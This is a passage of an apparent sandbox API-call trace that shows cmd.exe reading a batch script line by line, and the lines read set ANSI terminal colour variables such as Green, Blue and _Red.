lpDistanceToMoveHigh=0x0) returned 0x56c16 [0176.543] GetProcessHeap () returned 0x19a8f1e0000 [0176.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.543] GetProcessHeap () returned 0x19a8f1e0000 [0176.543] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.543] GetProcessHeap () returned 0x19a8f1e0000 [0176.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0176.543] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.543] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.543] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.544] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.544] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.544] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.544] GetProcessHeap () returned 0x19a8f1e0000 [0176.544] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0176.544] GetProcessHeap () returned 0x19a8f1e0000 [0176.544] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc20 [0176.544] GetProcessHeap () returned 0x19a8f1e0000 [0176.544] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f9270 [0176.544] _get_osfhandle (_FileHandle=3) returned 0xac [0176.544] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c16 [0176.544] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe4d0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe4d0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.544] SetFilePointer (in: hFile=0xac, lDistanceToMove=355371, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c2b [0176.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Black=\"30m\"\"\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Black=\"30m\"\"\r\n\"\"\r\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 21 [0176.544] _get_osfhandle (_FileHandle=3) returned 0xac [0176.544] GetFileType (hFile=0xac) returned 0x1 [0176.544] _get_osfhandle (_FileHandle=3) returned 0xac [0176.544] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c2b [0176.544] GetProcessHeap () returned 0x19a8f1e0000 [0176.544] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.544] GetProcessHeap () returned 0x19a8f1e0000 [0176.545] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.545] GetProcessHeap () returned 0x19a8f1e0000 [0176.545] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0176.545] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.545] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.545] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.545] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.545] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.545] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.545] GetProcessHeap () returned 0x19a8f1e0000 [0176.545] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0176.545] GetProcessHeap () returned 0x19a8f1e0000 [0176.545] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec780 [0176.545] GetProcessHeap () returned 0x19a8f1e0000 [0176.545] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0a30 [0176.545] _get_osfhandle (_FileHandle=3) returned 0xac [0176.545] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c2b [0176.545] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe4a0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe4a0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.546] SetFilePointer (in: hFile=0xac, lDistanceToMove=355395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c43 [0176.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Green=\"42;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Green=\"42;97m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.546] _get_osfhandle (_FileHandle=3) returned 0xac [0176.546] GetFileType (hFile=0xac) returned 0x1 [0176.546] _get_osfhandle (_FileHandle=3) returned 0xac [0176.546] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c43 [0176.546] GetProcessHeap () returned 0x19a8f1e0000 [0176.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.546] GetProcessHeap () returned 0x19a8f1e0000 [0176.546] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.546] GetProcessHeap () returned 0x19a8f1e0000 [0176.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0176.546] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.546] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.546] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.546] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.546] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.546] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.546] GetProcessHeap () returned 0x19a8f1e0000 [0176.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0176.546] GetProcessHeap () returned 0x19a8f1e0000 [0176.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec940 [0176.547] GetProcessHeap () returned 0x19a8f1e0000 [0176.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0df0 [0176.547] _get_osfhandle (_FileHandle=3) returned 0xac [0176.547] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c43 [0176.547] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe470, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe470*=0x1fff, lpOverlapped=0x0) returned 1 [0176.547] SetFilePointer (in: hFile=0xac, lDistanceToMove=355419, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c5b [0176.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Blue=\"44;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Blue=\"44;97m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.547] _get_osfhandle (_FileHandle=3) returned 0xac [0176.547] GetFileType (hFile=0xac) returned 0x1 [0176.547] _get_osfhandle (_FileHandle=3) returned 0xac [0176.547] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c5b [0176.547] GetProcessHeap () returned 0x19a8f1e0000 [0176.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.547] GetProcessHeap () returned 0x19a8f1e0000 [0176.548] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.548] GetProcessHeap () returned 0x19a8f1e0000 [0176.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0176.548] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.548] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.548] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.548] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.548] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.548] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.548] GetProcessHeap () returned 0x19a8f1e0000 [0176.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0176.548] GetProcessHeap () returned 0x19a8f1e0000 [0176.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecaa0 [0176.548] GetProcessHeap () returned 0x19a8f1e0000 [0176.548] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0ab0 [0176.548] _get_osfhandle (_FileHandle=3) returned 0xac [0176.548] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c5b [0176.548] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe440, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe440*=0x1fff, lpOverlapped=0x0) returned 1 [0176.548] SetFilePointer (in: hFile=0xac, lDistanceToMove=355443, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c73 [0176.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Yellow=\"43;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Yellow=\"43;97m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.548] _get_osfhandle (_FileHandle=3) returned 0xac [0176.548] GetFileType (hFile=0xac) returned 0x1 [0176.548] _get_osfhandle (_FileHandle=3) returned 0xac [0176.549] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c73 [0176.549] GetProcessHeap () returned 0x19a8f1e0000 [0176.549] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.549] GetProcessHeap () returned 0x19a8f1e0000 [0176.549] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.550] GetProcessHeap () returned 0x19a8f1e0000 [0176.550] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0176.550] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.550] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.550] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.550] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.550] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.550] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.550] GetProcessHeap () returned 0x19a8f1e0000 [0176.550] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0176.550] GetProcessHeap () returned 0x19a8f1e0000 [0176.551] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec680 [0176.551] GetProcessHeap () returned 0x19a8f1e0000 [0176.551] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a70 [0176.551] _get_osfhandle (_FileHandle=3) returned 0xac [0176.551] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c73 [0176.551] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe410, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe410*=0x1fff, lpOverlapped=0x0) returned 1 [0176.551] SetFilePointer (in: hFile=0xac, lDistanceToMove=355467, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c8b [0176.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Magenta=\"45;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Magenta=\"45;97m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.551] _get_osfhandle (_FileHandle=3) returned 0xac [0176.551] GetFileType (hFile=0xac) returned 0x1 [0176.551] _get_osfhandle (_FileHandle=3) returned 0xac [0176.551] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c8b [0176.551] GetProcessHeap () returned 0x19a8f1e0000 [0176.551] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.551] GetProcessHeap () returned 0x19a8f1e0000 [0176.552] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.552] GetProcessHeap () returned 0x19a8f1e0000 [0176.552] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0176.552] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.552] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.552] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.552] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.552] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.552] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.552] GetProcessHeap () returned 0x19a8f1e0000 [0176.552] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff490 [0176.552] GetProcessHeap () returned 0x19a8f1e0000 [0176.552] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec6e0 [0176.552] GetProcessHeap () returned 0x19a8f1e0000 [0176.552] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0cb0 [0176.552] _get_osfhandle (_FileHandle=3) returned 0xac [0176.552] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c8b [0176.552] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe3e0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe3e0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.552] SetFilePointer (in: hFile=0xac, lDistanceToMove=355469, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c8d [0176.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"Magenta=\"45;97m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0176.553] _get_osfhandle (_FileHandle=3) returned 0xac [0176.553] GetFileType (hFile=0xac) returned 0x1 [0176.553] _get_osfhandle (_FileHandle=3) returned 0xac [0176.553] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c8d [0176.553] GetProcessHeap () returned 0x19a8f1e0000 [0176.553] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.553] GetProcessHeap () returned 0x19a8f1e0000 [0176.553] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.553] _get_osfhandle (_FileHandle=3) returned 0xac [0176.553] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56c8d [0176.553] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe3e0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe3e0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.554] SetFilePointer (in: hFile=0xac, lDistanceToMove=355493, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56ca5 [0176.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Red=\"40;91m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_Red=\"40;91m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.554] _get_osfhandle (_FileHandle=3) returned 0xac [0176.554] GetFileType (hFile=0xac) returned 0x1 [0176.554] _get_osfhandle (_FileHandle=3) returned 0xac [0176.554] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56ca5 [0176.554] GetProcessHeap () returned 0x19a8f1e0000 [0176.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.554] GetProcessHeap () returned 0x19a8f1e0000 [0176.554] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.554] GetProcessHeap () returned 0x19a8f1e0000 [0176.554] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fe350 [0176.554] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.554] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.554] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.554] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.554] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.555] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.555] GetProcessHeap () returned 0x19a8f1e0000 [0176.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fead0 [0176.555] GetProcessHeap () returned 0x19a8f1e0000 [0176.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd40 [0176.555] GetProcessHeap () returned 0x19a8f1e0000 [0176.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0f30 [0176.555] _get_osfhandle (_FileHandle=3) returned 0xac [0176.555] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56ca5 [0176.555] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe3b0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe3b0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.555] SetFilePointer (in: hFile=0xac, lDistanceToMove=355517, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56cbd [0176.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Green=\"40;92m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_Green=\"40;92m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.555] _get_osfhandle (_FileHandle=3) returned 0xac [0176.555] GetFileType (hFile=0xac) returned 0x1 [0176.555] _get_osfhandle (_FileHandle=3) returned 0xac [0176.555] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56cbd [0176.555] GetProcessHeap () returned 0x19a8f1e0000 [0176.555] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.555] GetProcessHeap () returned 0x19a8f1e0000 [0176.556] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.556] GetProcessHeap () returned 0x19a8f1e0000 [0176.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1feb90 [0176.556] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.556] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.556] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.556] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.556] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.556] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.556] GetProcessHeap () returned 0x19a8f1e0000 [0176.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fed10 [0176.556] GetProcessHeap () returned 0x19a8f1e0000 [0176.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecac0 [0176.556] GetProcessHeap () returned 0x19a8f1e0000 [0176.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e09f0 [0176.556] _get_osfhandle (_FileHandle=3) returned 0xac [0176.556] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56cbd [0176.556] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe380, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe380*=0x1fff, lpOverlapped=0x0) returned 1 [0176.557] SetFilePointer (in: hFile=0xac, lDistanceToMove=355541, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56cd5 [0176.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Blue=\"40;94m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_Blue=\"40;94m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.557] _get_osfhandle (_FileHandle=3) returned 0xac [0176.557] GetFileType (hFile=0xac) returned 0x1 [0176.557] _get_osfhandle (_FileHandle=3) returned 0xac [0176.557] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56cd5 [0176.557] GetProcessHeap () returned 0x19a8f1e0000 [0176.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.557] GetProcessHeap () returned 0x19a8f1e0000 [0176.557] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.557] GetProcessHeap () returned 0x19a8f1e0000 [0176.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fded0 [0176.557] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.557] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.557] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.557] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.557] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.557] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.557] GetProcessHeap () returned 0x19a8f1e0000 [0176.558] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff9d0 [0176.558] GetProcessHeap () returned 0x19a8f1e0000 [0176.558] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca40 [0176.558] GetProcessHeap () returned 0x19a8f1e0000 [0176.558] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0ef0 [0176.558] _get_osfhandle (_FileHandle=3) returned 0xac [0176.558] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56cd5 [0176.558] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe350, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe350*=0x1fff, lpOverlapped=0x0) returned 1 [0176.558] SetFilePointer (in: hFile=0xac, lDistanceToMove=355565, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56ced [0176.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_White=\"40;37m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_White=\"40;37m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.558] _get_osfhandle (_FileHandle=3) returned 0xac [0176.558] GetFileType (hFile=0xac) returned 0x1 [0176.558] _get_osfhandle (_FileHandle=3) returned 0xac [0176.558] SetFilePointer 